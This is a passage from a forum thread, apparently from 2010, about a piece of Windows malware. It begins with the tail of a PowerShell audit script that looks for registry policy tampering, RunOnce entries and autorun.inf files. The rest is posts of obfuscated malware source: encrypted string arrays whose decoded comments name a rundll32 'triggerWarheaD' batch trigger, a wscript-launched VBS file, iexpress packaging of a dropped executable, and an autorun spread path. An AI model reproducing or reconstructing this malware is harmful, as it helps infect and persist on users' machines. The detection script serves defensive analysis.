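    @{ Sub = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableTaskmgr' },
    @{ Sub = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableRegistryTools' },
    @{ Sub = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoDriveTypeAutoRun' },
    @{ Sub = 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'; Name = 'ShowSuperHidden' },
    @{ Sub = 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'; Name = 'SearchHidden' }
)
foreach ($hive in 'HKLM', 'HKCU') {
    foreach ($c in $policyChecks) {
        $path = "$($hive):\$($c.Sub)"
        $v = Get-RegValue $path $c.Name
        if ($null -ne $v) { $Findings.Add("$($c.Name) = $v under $path") }
    }

    # 5. RunOnce entries in both hives (the source writes a rundll32 trigger there).
    $ro = "$($hive):\Software\Microsoft\Windows\CurrentVersion\RunOnce"
    if (Test-Path $ro) {
        (Get-ItemProperty $ro).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |
            ForEach-Object { $Findings.Add("RunOnce ($hive): $($_.Name) = $($_.Value)") }
    }
}

# 6. autorun.inf at a drive root is the removable-media spread path named in
#    the decoded comments (plainbuffer[57]).
Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    $inf = Join-Path $_.Root 'autorun.inf'
    if (Test-Path $inf) { $Findings.Add("autorun.inf present at $($_.Root)") }
}

if ($Findings.Count -eq 0) {
    'No deviations found in the audited locations.'
} else {
    $Findings | ForEach-Object { "[!] $_" }
}
```

    Every reported line needs a human decision: a Winlogon Notify package or a RunOnce value can be legitimate software, so compare the listed DllName and command paths against the installed inventory before acting on them.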

  5. #5
    Code:
    "\xBA\xB0\xA0\x9E\xF5\xF1\x90\x8B\xF2\x99\xD7\xD3\x84\xDE\xAE\x8F\xFA"\
    					  "\xB9\xD8\x8C\xC2\x99\xB3\xB6\xEE\xDE\xE2\xB1\xFE\xB3\xF3\x85\xF4\xE5"\
    					  "\xBB\xF7\x94\xAC\xEB\x94\x9C\xE1\x80\xF4\xED\x80\xAB\x92\xC6\xC0\x89"\
    					  "\xDB\xB7\xA7\x91\x8B\xB3\xB2\xF5\x99\xC2\xE3\xB3\xCF\xD8\xB4\xAD\xFE"\
    					  "\xE5\x95\x9C\xF8\xC6\xA3\xE7\xBF\xFC\xBC\x9B\xF4\x80\xB7\xED\xE5\x9C"\
    					  "\xD7\x84\x89\xC1\x9F\xA5\xAD\xAC\xFF\x8C\x8C\xAE\xCF\xC0\xEA\xFB\xD3"\
    					  "\xD6\xC7\xC4\xFD\xEE\xBB\xCB\xC5\xDA\xC0\xC6\xE8\xC7\xCB\xC4\xEA\x97"\
    					  "\xCA\x85\xA3\xED\xBB\xBB\xFF\xB3\x99\xEC\x83\x98\x82\xF8\xC5\xD1\xFD"\
    					  "\xAE\xCE\x92\xA8\x83\xCA\xC8\xCB\x8D\xE0\xC5\xAC\xCD\x80\xA5\xD3\xAB"\
    					  "\xC0\xC6\xA1\xF8\xE3\x9F\x8D\xAA\xE3\xC7\xDB\x90\xC1\xC1\xF6\xF1\x9B"\
    					  "\xB8\xA6\x84\xF5\xC5\xF8\xF9\x97\xDA\xF2\xAC\xBE\xD8\xB7\xC6\xCE\xF4"\
    					  "\xDE\xE9\xB8\xCE\xD4\xF0\xFE\x80\xAC\x8A\xE8\x8C\xBB\xDC\x83\xC6\xB5"\
    					  "\xEB\xD1\xC0\x96\xD7\xFE\xB0\xD6\xD1\xA3\xF1\xA8\xC6\xE2\xC8\xA2\xD4"\
    					  "\xEC\xDC\x83\xDA\xC0\xA2\xF8\x83\xF8\x8B\xFD\xFB\xCD\xEF\x9B\xCA\x9A"\
    					  "\xCE\x86\xF4\x84\xD8\xC3\xE9\xC0\x8D\xB6\xF1\x9D\x8C\xE9\xD6\xDF\xC0"\
    					  "\xD6\x8C\xB1\xD5\x8D\xAF\xA5\xCE\xCC\x8E\xA5\x83\xE7\xB5\xD2\xFF\xA8"\
    					  "\xD6\x8C\x86\xFE\xC1\xB6\xF8\x9C\xF9\xEF\x87\xF2\xF1\xD8\xBC\xBD\xFE"\
    					  "\xF9\xE8\xEC\xED\x9A\xF9\x8F\xCA\xFB\x89\xEA\x85\x83\xFF\x8C\xF4\x80"\
    					  "\xC2\x81\x94\xE3\xCD\x82\x8E\xC2\x90\xA2\xCF\x8C\x90\xAC\xFD\xF7\xD5"\
    					  "\xED\xB1\xA1\xB6\x86\x97\x94\xF4\x9F\xB2\xD5\xD9\x9F\xD8\xC2\xE8\x9F"\
    					  "\xC3\xAA\xE8\x81\xFC\xFC\xA6\xF4\xD4\x8D\xCA\x95\x86\xE9\x82\xA7\xD0"\
    					  "\x8C\xF9\xDD\xAC\xBD\x92\xD4\xE0\xE8\x8F\x90\xDE\xC7\xC9\xC2\xDF\xD3"\
    					  "\xE8\xFA\xBF\x8D\xB8\xF5\xDF\xA8\xF8\x82\xBA\xD5\xED\xA7\xC4\xF9\x94"\
    					  "\x93\x82\x83\x9D\xC5\xD3\xC0\xAF\xB6\xD5\xB2\xE5\x82\x87\xFB\xC5\x93"\
    					  "\x8D\xBD\x8C\xD8\xE3\xD6\xAD\xAA\xDE\xCD\xC7\x8B\xC8\x93\x9D\xC1\xE0"\
    					  "\xD9\x8F\xA9\xC1\xC8\xF8\xC4\xEA\x84\xF8\xBB\xEA\xC6\xA7\xCA\xE4\x8A"\
    					  "\xF8\xC3\xF9\xCD\xF2\xB5\xDC\xCF\xC7\xC0\xA7\xFF\xEC\xFA\x8A\xB4\xCC"\
    					  "\xCE\xC4\xE2\xE4\xA3\xA0\xF2\xC7\xC1\xB9\x98\x92\xA0\xD7\x8F\x99\xD2";
    	plainbuffer[61] = "\xDD\xD9\xEC\xEE\xB3\x98\xF0\xCA\xCC\x87\xB8\xBC\x9E\xD7\xE1\x98\xF1"\
    					  "\xE3\xB0\xB1\x88\xD8\xC6\xEF\x84\x99\xE8\x98\x87\xAE\xD7\xF6\x8F\x9F"\
    					  "\xF7\x81\xE6\x85\x85\xCA\xF1\xBA\xF7\xCF\xA7\xED\xF9\xA6\xE6\xE3\xA6"\
    					  "\xEB\xBB\xF0\x83\xF0\xF8\x91\x83\xA8\x8C\xA0\xE6\x86\xB9\xD5\xC0\xD3"\
    					  "\xB0\xD4\xAA\xBB\xD4\x8B\x94";//"\@echo off\n\%SystemRoot\%\\system32\\rundll32.exe retaliator.bat, triggerWarheaD"; // *natdat = "\@echo off\n\%SystemRoot\%\\system32\\rundll32.exe NatSec.dll, triggerWarheaD";
    	plainbuffer[62] = "\xC2\xA2\xF3\xA2\xAD\xFA\xBE\x84\xC4\x81\xC9";//"USERPROFILE"; // empty = getenv("USERPROFILE");
    	plainbuffer[63] = "\xDD\xA9\xE8\xB9\xB0\xE1\xBA\xD8\xF0\xC8\x85\x9F";//"explorer.exe";
    	plainbuffer[64] = "\x9F\x91\xA3\xE0\xCE\xC5\xF4\x92\x9D\xFB\xEC\x9F";//"rundll32.exe";
    	plainbuffer[65] = "\xAA\xC0\xE0\x88\xE6\xAA\xF1\x95\x9B\xE2\xFC\xEA\x94\xC1\x9D";//"ALLUSERSPROFILE";
    	plainbuffer[66] = "\x99\xC6\x84\xF1\x8A\xCB\xC3\xF5\xC0\x8C\xA2\xF8";//"winlogon.exe";
    	plainbuffer[67] = "\xE9\xD4\xA7\xE0\x80\xAB\xFA\x87";//"explorer";
    	plainbuffer[68] = "\x9B\xE3\xC2\xB9\xC6\x99\xFD\x91";//"rundll32";
    Last edited by fb1h2s; 10-13-2010 at 11:00 PM.

  6. #6
    Code:
    plainbuffer[69] = "\xBC\xB9\xEE\xEF\xF7\xD3\xC7\xF7\xA4\xBD\xE3\xD1\xCE\xFC\xCF"\
    					  "\xAB\x93\xA9\xA6\x9B\xD0\xA9\xA8\x93\x8B\xC7\xD6\xCF\xDB\xA5"\
    					  "\x9E\xD4\xCF\xCA\x98\xE5\xDF\xDC\x8A\xF2\x86\xEA\x82\x93\xDD"\
    					  "\x86\x9B\xB7\xBD\xDB\xE2\xE3\xF7\xD0\xC5\xC6\xE8\xBD\x8E\xF9"\
    					  "\x8B\x89\xE7\x8C\xAA\x99\xFE\x97\xDF\xE0\xC7\xF1\x9F\xDF\x8A"\
    					  "\xC6\x8E\xC8\xDD\x9D\xDB\xA3\xF5\xDB\xBF\xDC\x85\xAB\x84\x86"\
    					  "\x82\xFF\xB5\x99\xF4\x88\x85\xF4\x86\xE8\x9F\x8A\xDE\xF8\xB9"\
    					  "\xC7\x9A\xC5\xCC\xBB\xB6\xEA\xD0";
    	plainbuffer[70] = "\xB7\xFB\xF4\xFC\xA3\xFB\xA0\x99\xF6\xE2\xEB\xDF";//"\\winntsp.vbs"; // *sfpointr
    	plainbuffer[71] = "\x83\xA9\x8F\x9E\xE8\xF5\x8D\x9E\xB2\x98\x92\xF8";//"\\wscript.exe";
    	plainbuffer[72] = "\xEB\x8E\x8C\xF6\xC5\xA4\xE0\xCF\xFC";//"wscript \"";
    	plainbuffer[73] = "\xF2";//"\"";
    	plainbuffer[74] = "\xFB\xDB\xDA";//" ji";
    	plainbuffer[75] = "\x8D\x89\x8F\xF5\x84\xFE\xF8\xB3\xBD\x84\xAE\xA9\xD9\x8D\xDD"\
    					  "\x85\xEF\xC4\xED\xD1\x8E\xB6\x87\xA6\xDE\x8A\xE5\xB9\xFE\xC3";
    					  //" tuhaadi seva bich haazir hai.";
    	plainbuffer[76] = "\xB9\xE4\xDF\xF8\xA5\x99\xE9\xBF\xDE\x84\xAF\x80\xAC\xE1\xBC\xDB\x8E\xC4\xA3\xB9";
    					  //"Windows Task Manager";
    	plainbuffer[77] = "\xE4\xFF\xC7\xD9\x8C\xD6\x8F";//"Jaijeya";
    	plainbuffer[78] = "\xA2\xC0\xCA\x93\x89\xDF\xE9\xA8\x9D\xC7\xBD\xE4\xCD\xB6\xE7"\
    					  "\xCF\x91\xFE\x9C\xF3\xE9\x91\x96\xB9\xE1";
    					  //"Hor Theek-Thaak Hainn Na?";
    	plainbuffer[79] = "\x9A\xD6\xBC\x9D\xAC\xE0\xA4\xFE\xE2\xA4\xEE\x83\xF9\xDD\xB0"\
    					  "\xBA\x88\xB2\xDE\xCC\x91";
    					  //"Tusaan bas huqm deya.";
    	plainbuffer[80] = "\xAC\xC4\xB3";//"Run";
    	plainbuffer[81] = "\x9C\xDE\xDF\xC0\xD5\x9F\xED\xE1\xDE\xCC\x88\xCF\xB1\xAC\xC3\xE2"\
    					  "\xA9\xB5\xD8\xBD\xE6\xD9\xE1\x9A\x81\xFD\xAC\xE0\xB0\xFA\xF7\xC9"\
    					  "\x95\xAD\x9A\xE7\xEB\x81\x9D\xAB\x9D\x86\xAE\xF2\xB1\xB9\xD0\xFE"\
    					  "\xAB\xD9\xB6\xD2\xE4\x9F\xF1\xCD\x99\xFF\xE9\xE4\xE1\x8A\x9B\xDE"\
    					  "\x94\xBD\x87\xE0\xE5\xEE\xA6\xEA\x85\xEF\xA1\xAE\x89\x95\xCD\xDA"\
    					  "\xA9\xD5\xB5\xDA\xAC\xFA\x8A\x81\xFB\x8D\xDB\x8A\xE1\xF8\xB2\xF0"\
    					  "\xAF\xF1\x87\xB9\xE0\xFA\xC9\xBE\xB8\xD5\x91\xDE\xF4\xCA\xC4\xF1"\
    					  "\xD0\xC1\xE7\xB1\xDD\xBF\x91\x8A\xAF\xF3\x8E\x93\xD7\xF0\x9E\xBE"\
    					  "\xBB\xAC\xAA\x8E\xB9\xFF\xEF\x9E\x98\xBC\xC0\xCA\xBF\xA7\xDF\x94"\
    					  "\x86\xED\xC8\xE3\x87\x96\x99\xBC\xBC\xE0\xDF\xE9\xEB\xBC\xB4\xE8"\
    					  "\xFD\xEF\xE2\xAA\xF3\x81\xFE\xBA\xDD\x9C\xF1\xDC\xA4\xFB\x9D\xAA"\
    					  "\x92\xCA\xC7\xC7\xC1\xB0\xB6\x91\x89\xBF\xBC\xEC\x88\xD3\xE8\xB5"\
    					  "\x80\x96\xD2\xA7\xAA\xE4\xA4\x8B\xEE\x95\xA7\xF8\xA8\xFB\xF5\xC7"\
    					  "\xB8\x82\xB4\xF1\xF4\xC0\x84\xC3\x81\x83\xAE\xE0\x87\x9E\xE9\xD8"\
    					  "\xDF\xA9\xC2\xDD\xCA\xBE\xC5\xC4\xC4\xD9\xE1\xF4\x8C\x98\xEE\xCD"\
    					  "\xC9\xCB\xF9\xDA\xE1\xC5\xF5\x86\xCC\xCC\xF9\xBA\x82\xAC\xF0\xAD"\
    					  "\xC3\xAE\xD9\xD3\xB4\xF8\x91\xE8\xF3\xA8\xF6\xD5\xE2\xD5\xCB\xD9"\
    					  "\xCD\xAF\xE3\xC1\xBD\xCC\x9B\xB2\x8F\xEF\x91\x8A\xE2\xBA\xFD\xA3"\
    					  "\x81\xB9\xF3\xCD\xDB\xAC\x8E\xF0\xF1\xF9\x8A\x89\xD8\xDA\xDE\xE4"\
    					  "\xEC\xB4\x91\xB1\xDF\xE4\xA8\xDA\xAA\xF6\x9D\xE8\xC3\xBC\xB9\x9A"\
    Last edited by fb1h2s; 10-13-2010 at 11:01 PM.

  7. #7
    Code:
    "\xE8\xCA\xF9\x80\xAE\xA5\xED\xC1\xB8\x99\xCF\xD0\xB2\xB9\xF3\xDC"\
    					  "\xC1\xAD\xF8\xAC\xD6\xCF\xC5\xBF\xBF\xC7\xAC\xC3\xAC\xD2\x8C\x97"\
    					  "\xDE\x9F\x85\xE7\x9F\xA8\xED\xB0\xCC\xF4\xCB\xD0\x9D\x87\xCC\xF8"\
    					  "\x83\xF3\xAB\xF8\x96\xB4\xC1\xCB\xFA\xBB\x91\xDF\xE9\xD6\xF5\xC8"\
    					  "\xDC\x99\xB6\xF6\x89\xAF\xE4\xA1\xDE\x8F\xDB\x98\xDC\xBF\xDD\xD9"\
    					  "\xBE\x93\x98\xC9\xB1\x8C\xB8\xEE\x85\x8A\xE6\x86\xB3\xC4\xC3\xBD"\
    					  "\xB9\xAA\xFB\xB2\xAB\xF9\x9D\xF9\x8F\xC8\xB1\xC5\xFC\x89\x98\xC8"\
    					  "\x96\xFD\x9B\xF8\x99\xC3\x8C\xBF\xA6\xB2\xC8\x9F\x9B\xD0\xAA\x8E"\
    					  "\xE3\xC8\xF1\xF0\xEF\x99\xAF\x86\xE9\x8C\xE0\xBA\x9F\xA3\xD5\xEB"\
    					  "\xCA\xC0\xC6\xC3\xDE\xC1\xBF\x87\x80\xBE\xF0\x9A\xEB\xD4\xDF\x8A"\
    					  "\xB0\x8E\xFF\xDB\xDF\xF0\x9F\xE2\xDA\x85\xBA\xDE\x8C\xFD\xBE\xA8"\
    					  "\x9B\xE9\xD6\xDF\xCC\xFF\xB6\xE8\xEC\xF0\x84\xB8\xE9\xDE\xF2\xCE"\
    					  "\x8A\xFD\xB7\xD0\x87\xFF\xCB\xB7\xAD\xD5\x91\xC0\xD5\xCD\xFC\xC4"\
    					  "\xFE\xE0\xAA\xE6\x9C\x8C\x86\xC3\x9F\x80\xCD\x84\xC5\xE3\xC4\xB0"\
    					  "\xAC\xC9\xAB\x93\xDE\x8D\xF2\xAD\xFB\xD2\xE9\xE9\x85\xE1\xEC\xC8"\
    					  "\xFE\xDB\xA9\xC2\x9C\x8B\xEA\x8A\xB5\xDE\xAD\xCC\xFF\x9E\xEB\xBD"\
    					  "\x97\xFE\x9A\xF2\xE1\x86\x87\xCA\x9C\xB6\x9C\xEC\xE3\xFB\xB7\xE8"\
    					  "\x98\x9F\xD5\xDC\xEA\x82\xAD\xAB\xCE\xB6\xE8\xED\xD2\xE7\xBD\x98"\
    					  "\xCB\x8C\xF0\x99\xA2\xCD\xE7\xB9\xAF\xF1\x9C\xAB\xF1\xFB\xEA\xB1"\
    					  "\xFB\xB8\x91\x88\xAA\xAC\xDE\xFF\xD6\xDF\xE7\xAF\xCB\xE8\xC3\xD8"\
    					  "\xE9\xDB\xE5\x88\xC6\xFF\xA8\xEF\xD4\xAD\xF0\xAF\x98\xEE\xD5\x93"\
    					  "\x8C\xF3\xF7\x99\xF8\x91\x8A\x92\x88\xF3\xA2\xF8\x86\xC3\x88\xFF"\
    					  "\xE2\xAF\xED\xE2\xEB\xD3\xB0\xED\xEA\xAC\xFE\xE7\xBD\xA6\xB7\xF2"\
    					  "\xB3\xBB\xBE\x83\xFB\xB6\xCF\xF8\x92\xD6\xD5\x95\xF6\xB7\xBE\xC1"\
    					  "\x9F\xA4\xB4\xEE\xDD\x81\xAD\xE5\x81\xF5\xBC\xB9\xB7\xF8\x9D\x99"\
    					  "\xE9\x94\xB1\xE3\xB5\xED\xA6\xD6\xFF\xD2\xBE\xF7\xE7\xD3\x9F\xFA"\
    					  "\x92\xCA\x9B\x85\xFF\xA2\xF9\xDC\xD1\x87\xC4\xD3\xAC\xB4\xD3\xD9"\
    					  "\xFE\xD8\xEF\xA6\x9F\xF9\xE9\xCC\xFC\xCB\xF9\xD7\x87\xAD\x95\xB0"\
    					  "\xDA\xDA\xF1\xDB\xBD\xBA\xF0\xB4\xFF\xAD\xC8\x8F\xD2\xEE\x91\xED"\
    					  "\xC9\xA9\xF8\x85\xE7\xFF\xCB\xD9\xCD\xAF\xE3\xC1\xBD\x90\xE5\xDE"\
    					  "\xAE\xAA\xD8\x8A\xE2\xBA\xFD\xBE\x9D\xBE\xF0\xC7\xC4\xE7\x9D\x93"\
    					  "\xD9\xF1\x8E\xB3\xCE\xD5\xC9\xC9\xF9\xF1\xD6\xEC\xF5\xE2\x83\xED"\
    					  "\xFB\x8C\xC1\xAF\x91\xBA\xEA\x9D\xEE\xED\xC9\x8A\xB1\x9B\xAC\x8A"\
    					  "\xFD\x97\xCD\x8A\xCC\xC2\xDF\xD1\xC6\x8E\xF4\xAB\xC7\xD8\xA2\xE2"\
    					  "\x9C\xDA\xE0\xD8\xAB\xCA\xFF\xD3\x8D\xFE\xCA\xB5\xB9\xB4\xB1\xDD"\
    					  "\xDB\xED\xCB\xC1\xCB\x86\xE4\xA6\xAC\xF2\x97\x8C\xE9\xFA\x8D\x81"\
    					  "\xFA\xF2\xD3\xC6\xC8\xD7\xD3\xD5\xC2\xC9\x8A\xEC\xCC\xB2\xAF\xC1"\
    					  "\xFE\x93\xDC\xCC\xD6\xB0\xBD\x85\xC4\xBF\x8C\xC9\xE0\xCF\xB6\xFF"\
    					  "\x8A\xF1\xF0\x97\xF7\xD2\xC2\xBD\xAA\xAD\xB0\xD4\xE8\xE1\x8B\xB5"\
    					  "\xDD\xD7\xBD\x89\xEC\x9C\x99\xF8\xCD\xEB\x9D\xC4\xAD\xDD\x8C\xE4"\
    					  "\x85\xFD\xFE\x9D\xAB\xCD\xC5\xF5\xC4\x87\xEB\xFE\xE9\x82\xBD\x8E"\
    					  "\xFE\xDF\xF3\xC9\x89\xA3\xF7\xCC\xCC\xDF\xDD\xE2\xCD\xC8\xFA\xFE"\
    					  "\x9B\xAE\xCA\xAE\xEB\xC2\xDA\xCB\x86\x8F\x86\xB1\xA4\x90\x80\xF4"\
    					  "\xD9\xBF\xA7\x9B\xC3\x9B\xA1\xBD\x8E\xDE\x93\x91\x8F\xE2\xDE\xED"\
    					  "\xDB\xE9\xB4\xB9\xFF\x82\x9B\xF8\x9B\xA1\xC5\xE4\x87\xE9\xCE\x9E"\
    					  "\xB3\xD0\xD6\xC0\x83\x96\xA6\xAC\x84\x9A\xB2\xEB\x84\xB8\xED\xDF"\
    					  "\x8E\x9D\xF2\x97\xD2\xB0\x8E\xFF\xB1\xCF\x87\xE6\x90\xC8\xC1\xAF"\
    					  "\xC4\xEC\xDB\xDC\xFA\xFE\xFF\xBB\xEC\xC8\xBE\xC2\x8A\x8C\xFB\x9A"\
    					  "\xA5\xD3\xB1\xD2\xF4\x81\xFE\xD4\x8A\xE9\xE5\xE3\xE4\x86\x8B\xC8"\
    					  "\x9E\xE3\xD1\xAA\xA4\xC0\x8A\xC7\x90\xAE\xEF\xFD\xD8\xB2\x8F\x8E"\
    					  "\xDB\x89\xDE\xCE\xAB\xA8\xE2\xD2\xF1\x9D\xFF\xBB\xED\xEE\xE1\xBA"\
    					  "\xE0\xA1\x8D\xF8\xDB\xDB\x8C\x9C\xDE\x8C\xBD\xFF\xC0\xD3\xE1\xDC"\
    					  "\xEF\xDC\xD1\x98\xE7\xDC\xED\xE4\xD9\xC2\xAC\xAF\xE5\xDB\xBA\xD9"\
    					  "\xBB\xD6\xD7\xF5\x92\xF8\xF6\xA8\x99\xF9\x8F\x99\xB3\xB5\xDF\x89"\
    					  "\xCA\xBB\x90\xF9\x8C\xC4\xBE\xB3\xBE\xE8\xD9\xA5\xB3\xBC\xBD\xE5"\
    					  "\xE5\x9F\xEB\xBC\xEC\x86\xB1\xEE\x99\xA9\xE8\xCD\xB3\xE7\xE5\xD7"\
    					  "\xBB\xAC\xCE\x85\xDF\x8D\xA0\xD4\x98\xA3\xFF\xDD\x9E\xC4\xE2\xB2"\
    					  "\xC0\xC0\x9C\xBD\xAD\xF7\x96\x86\xF8\x82\xF0\xAA\xFA\xD9\xB4\x96"\
    					  "\xEB\xC5\xDB\x8B\x9E\xF8\xD9\x92\x97\xFD\x82\xA7\xFF\xBE\xA2\xFF"\
    					  "\x9A\xB2\xE9\xD9\xE2\xB4\xBB\xBA\xA2\xA2\xDD\xA7\xD2\xCA\xC4\xCF"\
    					  "\xD8\x84\xDC\xCA\xC7\xD3\x95\xEA\xA6\xFD\xBF\xFC\xF5\x96\xF5\xD5"\
    					  "\xA3\x90\xC8\x85\x8E\x97\xA0\xF1\xF8\xFA\xCE\x82\xA9\xD5";
    	plainbuffer[82] = "\xC5\xC2\x9F\x8E\xDF\xD6\xC3\xC4\xD0\xD3\xB7\xD7\xFD\xFF\xBE\x84"\
    					  "\x88\xE6\xB6\xDD\xE3\xD9\x99\xBD\x90\xCC\xCF\xA1\x8A\x8E\xFE\xDF"\
    					  "\xB4\xDA\x81\x9E\xF5\xC1\xEB\xFC\xDC\xA9\xE4\xB7\xDD\xCE\x92\xC6"\
    					  "\x8A\xD2\xEF\xC7\xAF\xDF\xBA\xBE\xD8\xCD\xC8\xA8\xAB\xA8\xA4\xB6"\
    					  "\xC0\xED\xDA\xD2\x85\xC3\xAF\xDF\x9A\x97\xB6\xC4\xC3\xEC\xA7\x87"\
    					  "\xA9\xE9\xD0\xC0\xF1\xF4\xC4\xC8\xD6\x9B\xA2\xEF\xBB\xB4\xA3\xCF"\
    					  "\xC2\x9D\x92\x89\xB9\x95\xDE\xE8\xA8\xB3\x92\x9D\xFE\xCD\xB4\xF8"\
    					  "\xAE\xB7\xF6\x98\xFC\xF3\xD8\xB7\xB6\xE3\xAF\x90\xDC\xFF\x8B\xD0"\
    					  "\x92\x84\xFA\xA3\xE6\x91\x8F\xD3\x84\xF5\x8C\x8B\xC8\xA4\xA0\xF8"\
    					  "\xDF\xB4\xCE\x90\x8D\xCC\xA2\x8C\xBF\xEB\xF7\xEF\xE6\xB3\xF3\xDB"\
    					  "\x86\xEF\x9C\xD8\xB3\x91\xCE\xD5\xDA\xC8\xF9\xE4\xC5\xC9\xE7\xBD"\
    					  "\xE5\x9F\xDB\x8D\xC7\xE3\xC8\xD7\x82\xA8\xE3\xDC\xC8\xCA\x86\xF1"\
    					  "\xDD\x83\xBA\x99\x8C\xED\xC7\x8E\x8C\xCF\xDC\xC3\xDB\xC0\xD3\xE3"\
    					  "\xEB\xA7\x9F\xC1\xC5\xC2\xAF\xE9\x8E\xE5\x8B\xE1\x86\xE3\xD1\xA8"\
    					  "\xAB\x8C\x94\xFA\xCF\xCC\xD8\xC4\xE1\xFF\x8D\xFB\x81\x85\xFC\xD8"\
    Last edited by fb1h2s; 10-13-2010 at 11:01 PM.

  8. #8
    Code:
    "\xD8\xE0\xD9\x8C\xC5\xE0\xDF\xBE\xA7\xE1\x84\xD0\x86\xC3\xC0\x8C"\
    					  "\x95\xA8\xF8\xC6\xA9\xC1\xC1\xFA\xD4\xC0\x84\xFE\xBA\xA4\xD7\xBB"\
    					  "\xCF\x97\xA3\xE4\xDF\xB0\xDD\xF5\x95\xC9\xC9\xC0\xC4\xB2\xBD\xA2"\
    					  "\xFF\xAF\xB1\xCD\xC4\xDC\x80\xE0\xA5\xBC\xEF\xEF\xC8\xB8\xD8\xE0"\
    					  "\xC9\x84\xCD\xCE\xBD\xFC\x91\x93\xF3\x9A\xA8\xCE\xD8\xFC\xE0\xAA"\
    					  "\xEA\xA7\xA7\xB9\xF9\xEC\x89\xD7\xDC\xAD\x8B\xCF\xE8\xE8\xDD\xE4"\
    					  "\xF2\xEE\xEB\xB9\x85\xBA\xEA\xD8\xE4\xF8\x81\x83\xC8\xEC\xB3\xFD"\
    					  "\xDC\xBA\xFB\xF6\xBC\xEA\xEC\xB1\x8B\xE9\x93\x89\xF5\x80\xCE\xC0"\
    					  "\xCF\xD8\x95\xFA\xA5\xD7\x8D\xB1\xBC\xE7\xCF\xE3\xBA\x96\x82\xE8"\
    					  "\xFC\xBB\xC3\xA1\xEC\x85\xBF\xF0\x91\xAC\xE9\xC8\xE9\xB1\xBF\xB1"\
    					  "\xC1\xD1\xE8\x89\xC6\xAC\xB2\xDD\x86\x93\xBC\xF8\xD8\xAD\xCC\xA3"\
    					  "\xC3\xDD\xB6\x85\xAB\xFF\x91\x9E\xD4\x88\xA3\xE3\x99\xF2\xB1\xC7"\
    					  "\xBD\xE1\xB5\xEF\xFE\x9F\xE7\x85\x94\xCD\x85\x8B\xE3\xBE\xF8\xEF"\
    					  "\x92\xA2\x85\xBD\xD1\xA8\xD4\xC1\xFA\xDE\xE3\xB1\xC5\xF1\xC3\xCC"\
    					  "\xD8\xE9\xE0\xDB\x93\x82\xCA\x90\xCA\xCA\x80\xED\xBC\xBA\xE7\x96"\
    					  "\xC4\xAD\xD9\xBE\x97\xF9\xC0\x95\xCF\xB5\xE8\x85\xA8\xBA\xFE\xC4"\
    					  "\xD3\x89\xFF\x91\x9E\xD6\x9A\xA5\x9E\xAA\xEA\xC3\xE1\xBD\xE4\xE7"\
    					  "\xBF\x9E\xF0\xD0\xC0\xA9\xC7\xC0\xC3\x9E\xB3\x92\xDF\xCB\xCD\xC6"\
    					  "\xE1\x89\x86\xD4\xF1\xFC\xB9\x84\xCB\xE7\x87\xFE\xC1\xF0\xAB\x97"\
    					  "\xD6\xF6\xE9\x80\xB2\x98\xE9\x91\xD7\xF3\x86\xCD\xAF\xB8\xD8\xFE"\
    					  "\xC9\xAE\xFE\xB9\xD4\xD8\xF2\xC6\x8E\xD2\xFE\xCB\xAB\xCC\x91\x8F"\
    					  "\xC0\xDA\x85";
    	plainbuffer[83] = "\xAE\xF0\xD5\xD8\x8C\xAD\xE6\x80\xA4\x83\xCA\xC0\x8F\x92\xF2\xD2"\
    					  "\xB4\xDD\xE9\xB4\x97\xE0\xA8\xFC\xDC\x9B\xED\x9A\xB7\xFC\x9D\xF8"\
    					  "\xE3\x8C\xAA\xAD\xB0\xFA\xF6\xE5\xBF\xDC\xBC\x93\x8B\xE9\x96\xEA"\
    					  "\x9E\xC4\xF9\x89\xF4\xC5\x96\x8C\xDC\x80\xF1\xCB\xB8\xD8\xA2\xAF"\
    					  "\xD1\xA7\x99\xAC\xCA\x8E\xCC\xEC\xA4\xBA\xA2\xE2\xDF\xA9\xFB\x80"\
    					  "\xBB\xE4\xC0\xDB\x91\x96\xC3\xD0\xC2\xBF\xB3\xE5\x9D\xFE\xA2\xF1"\
    					  "\xDF\xFC\xD1\x9D\x8E\xF8\xF1\xC3\xEA\x9B\xD5\xDE\x8E\xE9\xF4\xE4"\
    					  "\xAE\xA8\xAE\xB8\xD8\xDA\xC9\xDB\xC4\xD2\xF4\xFA\xD9\xBC\xAF\xB1"\
    					  "\xA6\x9A\xD4\xA3\xCC\xD7\x8C\xD6\xC2\xDD\xAC\x8C\xD4\xD2\x9D\xC5"\
    					  "\xD3\xC0\x87\x87\xC8\x8E\xE6\x9B\x9A\xEF\xC9\xBB\x83\xF1\x80\xC5"\
    					  "\xCD\xB9\x8C\xB1\xD8\x9F\xD0\x86\xEB\xDA\x85\xCD\xFE\x8C\x92";
    	plainbuffer[84] = "\x84\x95\x81\xBA\xB7\xD6\xDF\xCC\x8D\xEB\xA9\xA3\xF9\xFD\x9F\x80"\
    					  "\xF7\xCF\xDB\xAC\xF3\xEC\xE8\xAD\xE2\xF8";
    	plainbuffer[85] = "\xDA\x88\xFD\xD2\xFC\xF6\xE7\xFC\x86\x8D\xC1\xEC\x9C\xB2\xE2\x9A\x9A";//"\\TEMP\\jaijeya.SED"; // *sedpointr
    	plainbuffer[86] = "\xC0\x86\xC2\xC2\x9F\xD6\xA5\xFE\x98\xB4\xF9\x84\x8E\xAA\xE9\x8C\xD1";//"\\TEMP\\jaijeya.EXE"; // *exepointr
    	plainbuffer[87] = "\xCE\xBF\x83\xC3\x9F\xD2\x91\xA8\xD1\xF6\x94";//"SYSTEMDRIVE";
    	plainbuffer[88] = "\xD1\xC8\xC7\xDC\xD8\xE8\xCC\xDD\x87\xB0\xB2\x8F\x97\x9C\xB8\xFA\x91\xB3";//"iexpress /Q /M /N ";
    	plainbuffer[89] = "\x9C\xF5\xF9\xD9\x9D\xDA\xBF\xAB\x82\xD0";//"SYSTEMROOT";
    	plainbuffer[90] = "\xC0\xB9\x97\xE9\xEB\xEF\x88\xEF\xD9\xD0\xC5\xB8\xCD\x9F\xD1\xA3\xB8\xC3\x9D\xC9\xA5\xE8";//"\\system32\\iexpress.exe";
    	plainbuffer[91] = "\xD9\x82\xCC\xC4\xF8\x9D\xC9";//"vlc.exe";
